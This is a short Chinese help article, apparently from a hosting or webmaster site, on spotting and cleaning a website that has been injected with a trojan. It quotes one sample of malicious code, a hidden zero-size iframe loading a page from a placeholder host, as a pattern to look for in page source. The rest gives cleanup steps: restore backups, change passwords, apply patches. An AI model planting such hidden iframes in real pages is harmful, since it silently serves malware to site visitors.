网站中木马,怎么办?
如果你的网站有上传漏洞或注入漏洞,很容易被黑客挂上木马,添加病毒代码。病毒代码一般类似这种形式:
< iframe src=http://www.xxx.com/xxxx.htm width=0 height=0> < / iframe>
查看你的网页源代码,如果发现类似上面的代码,而且不是你自己制作网页时放的框架代码,很可能你的网页已经被挂了木马。
黑客通常会在网站里面留下后门程序,以便日后再次侵入网站。
如果发现被挂马,应该立即采取下面行动:
1)删除主机账户里的文件,重新上传或恢复干净的备份。
2)修改账户及FTP密码。
3)对网站程序进行升级,打上相关的安全补丁,杜绝网站可能存在的安全漏洞。
如果你使用的是第三方软件,如WordPress,discuz,dede等,请务必注意新版本发布情况,一有新版本立即更新网站程序。如果你是使用自己开发的程序,需要注意安全性,特别是有文件上传功能的地方。
0 条评论 发表评论